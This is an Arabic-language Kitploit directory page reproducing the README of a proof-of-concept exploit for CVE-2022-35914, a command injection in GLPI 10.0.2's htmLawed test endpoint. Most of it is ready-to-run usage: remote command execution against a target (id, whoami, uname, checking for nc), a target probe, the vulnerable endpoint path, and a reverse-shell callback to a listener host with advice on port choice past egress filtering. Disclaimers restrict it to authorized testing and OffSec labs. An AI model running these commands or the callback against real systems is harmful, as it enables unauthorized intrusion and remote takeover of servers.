Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-35914-RCE — استغلال PoC لـ CVE-2022-35914 — حقن أوامر htmLawed في GLPI v.10.0.2، وتنفيذ أوامر، ودعم الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
الاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

استغلال PoC لـ CVE-2022-35914 — حقن أوامر htmLawed في GLPI v.10.0.2، وتنفيذ أوامر، ودعم الصدفة العكسية.

عرض المستودع
15منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-35914 بواسطة cyb3rk0ala

إثبات مفهوم (PoC) لـ CVE-2022-35914، وهي ثغرة حقن أوامر (command-injection) تتعلق بمكوّن الاختبار htmLawed في إصدارات GLPI المصابة.

توفّر الأداة تنفيذ الأوامر عبر نقطة النهاية المصابة، وتتضمّن وظيفة callback اختيارية لبيئات المختبر المصرّح بها.

إخلاء المسؤولية: هذا المشروع مخصّص للاختبار الأمني المصرّح به، وCTFs، ومختبرات OffSec/PG، والأغراض التعليمية فقط. لا تستخدمه ضد أنظمة دون تصريح صريح.


الثغرة

الحقلالتفاصيل
CVECVE-2022-35914
البرنامجGLPI v.10.0.2
المكوّنhtmLawed
نقطة النهاية المصابة/vendor/htmlawed/htmlawed/htmLawedTest.php

قد يسمح المكوّن المصاب بتنفيذ الأوامر عبر معاملات مُصمَّمة على التركيبات المتأثرة.


الميزات

  • تنفيذ الأوامر
  • إنشاء عنوان URL الهدف تلقائيًا
  • منفذ HTTP الهدف قابل للتكوين
  • استرجاع الجلسة/الرمز تلقائيًا
  • استخراج مخرجات الأوامر
  • فحص الهدف
  • دعم User-Agent مخصّص
  • تكوين callback اختياري
  • مخرجات طرفية ملوّنة
  • واجهة سطر أوامر Python 3

المتطلبات

Python 3 والاعتماديات المطلوبة.

Kali Linux

sudo apt install python3-requests python3-bs4

البيئة الافتراضية

python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

التثبيت

استنسخ المستودع:

git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

اجعل السكربت قابلًا للتنفيذ:

chmod +x glpi.py

الاستخدام

المساعدة

python3 glpi.py -h

تنفيذ أمر أساسي

python3 glpi.py -u TARGET_IP -c 'id'

مثال على المخرجات:

[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

تنفيذ الأوامر

يحدّد الخيار -c الأمر المراد تنفيذه.

المستخدم الحالي

python3 glpi.py -u TARGET_IP -c 'whoami'

الصلاحيات الحالية

python3 glpi.py -u TARGET_IP -c 'id'

نظام التشغيل

python3 glpi.py -u TARGET_IP -c 'uname -a'

الأدوات المتاحة

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

الخيارات

الخيارالوصفالافتراضي
-u, --urlعنوان URL الهدف أو عنوان IPمطلوب
-c, --cmdالأمر المراد تنفيذهid
--checkفحص الهدف دون تنفيذ أمرمعطّل
--user-agentHTTP User-Agent مخصّصالافتراضي
-p, --rportمنفذ خدمة HTTP الهدف80
-l, --lhostعنوان IP الخاص بالـ callback/المستمع—
-lp, --lportمنفذ الـ callback/المستمع—

منفذ الهدف

يحدّد الخيار -p / --rport المنفذ الذي تعمل عليه خدمة GLPI الويب المصابة.

الافتراضي:

80

مثال:

python3 glpi.py -u TARGET_IP -p 80 -c 'id'

فحص الهدف

استخدم --check للتحقق من توفّر صفحة اختبار htmLawed دون تنفيذ أمر:

python3 glpi.py -u TARGET_IP --check

User-Agent مخصّص

يمكن تمرير HTTP User-Agent مخصّص عبر:

python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

Reverse Shell

يدعم السكربت معاملات callback اختيارية:

-l   عنوان IP الخاص بالـ callback/المستمع
-lp  منفذ الـ callback/المستمع

مثال:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

في هذا المثال:

Target:   TARGET_IP:80
Callback: LHOST:80

للمنفذين غرضان مختلفان:

-p   = منفذ HTTP الخاص بـ GLPI الهدف
-lp  = منفذ الـ callback/المستمع

ملاحظة حول مختبر OffSec

أثناء الاختبار في بيئة مختبر OffSec، نجح الـ callback عبر منفذ TCP 80.

قد تنتهي مهل منافذ callback أخرى، مثل 4444، حسب شبكة المختبر وتصفية الاتصالات الصادرة (egress filtering).

بالنسبة للبيئة المُختبرة:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

تم تكوين المستمع على واجهة Kali VPN باستخدام منفذ TCP 80.

مهم: استخدام المنفذ 80 للـ callback هو ملاحظة خاصة بالبيئة. وهو ليس متطلبًا من متطلبات CVE-2022-35914.


استكشاف الأخطاء وإصلاحها

تنفيذ الأوامر يعمل لكن الـ callback لا يعمل

تحقّق أولًا من تنفيذ الأوامر:

python3 glpi.py -u TARGET_IP -c 'id'

تحقّق مما إذا كانت الأدوات المطلوبة موجودة:

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

إذا كان تنفيذ الأوامر يعمل لكن الـ callback تنتهي مهلته، فتحقّق من توجيه VPN ومنفذ الـ callback.


مخرجات الأوامر تبدو غير صحيحة

إذا فشل تحليل مخرجات الأوامر، يتم حفظ استجابة HTTP الكاملة في:

/tmp/glpi.html

افحصها باستخدام:

less /tmp/glpi.html

أو:

mousepad /tmp/glpi.html

مثال على سير العمل

1. فحص الهدف

python3 glpi.py \
    -u TARGET_IP \
    --check

2. تأكيد تنفيذ الأوامر

python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. تحديد المستخدم الحالي

python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. التحقق من الأدوات المتاحة

python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. تكوين الـ callback

بالنسبة لبيئة مختبر OffSec المُختبرة:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

إخلاء المسؤولية

يُقدَّم هذا المشروع لأغراض تعليمية ولأغراض الاختبار الأمني المصرّح به فقط.

المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر أو وصول غير مصرّح به أو نشاط غير قانوني يتعلق بهذا البرنامج.

احصل دائمًا على تصريح صريح قبل اختبار أي نظام.


المؤلف

cyb3rk0ala


CVE

CVE-2022-35914


المشروع

CVE-2022-35914 بواسطة cyb3rk0ala

تنزيل الأداة